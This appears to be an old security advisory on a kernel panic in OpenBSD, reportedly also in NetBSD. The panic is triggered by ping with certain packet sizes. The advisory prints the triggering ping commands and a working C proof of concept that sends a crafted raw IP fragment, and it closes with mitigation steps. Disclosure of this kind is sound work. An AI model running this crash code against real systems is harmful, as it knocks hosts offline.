COMMAND

    ping

SYSTEMS AFFECTED

    OpenBSD

PROBLEM

    Ficus carica found following on his OpenBSD.current PPP system:

        ping -s2955 1.2.3.4

    or

        ping -s1455 1.2.3.4

    causes kernel panic

    Thankfully this bug  does NOT appear  to be remotely  exploitable.
    There is second hand  confirmation that this problem  exists under
    netbsd as  well.   Note that  it seems  in order  for the previous
    commands  to  cause  reboot,  the  system  must NOT have a default
    route.  This could tend to reduce the impact of the bug.

    Note also that  this bug don't  work for big  number of cases  and
    it's only bug.  Anyway, code follows:

    /* 1-3 bytes of fragment data will cause panic.                 */
    /* ping -pff -s2955 to some interface with an MTU of 1500 bytes */
    /* will recreate this packet, so it's clearly legal.            */
    /* If it doesn't work, mail me for the original program.        */
    /* Ficus carica <fc@parkone.ci.oakland.ca.us>                   */

    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>

    char buf[] = "\x45\x00\x00\x17\x02\x7A\x01\x72\xFF\x01\xA7\xE6"
                 "\x01\x02\x03\x04\x05\x06\x07\x08\xFF\xFF\xFF";
    /* will not panic with more than three bytes    ^^  ^^  ^^      */

    main() {
            struct sockaddr_in thesocket;
            int sockd, on = 1;

            thesocket.sin_family = AF_INET;
            thesocket.sin_addr.s_addr = inet_addr("127.0.0.1");

            sockd = socket(AF_INET,SOCK_RAW,IPPROTO_RAW);
            setsockopt(sockd,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on));
            sendto(sockd, buf, sizeof(buf)-1, 0x0,
                    (struct sockaddr *)&thesocket, sizeof(thesocket));
            close(sockd); /* buf - 1 because of null terminator */
    }

SOLUTION

    Fix should be read as:

        1: chmod a-s /usr/sbin/traceroute /sbin/ping
        2: avoid goofing around with home made packet fraggers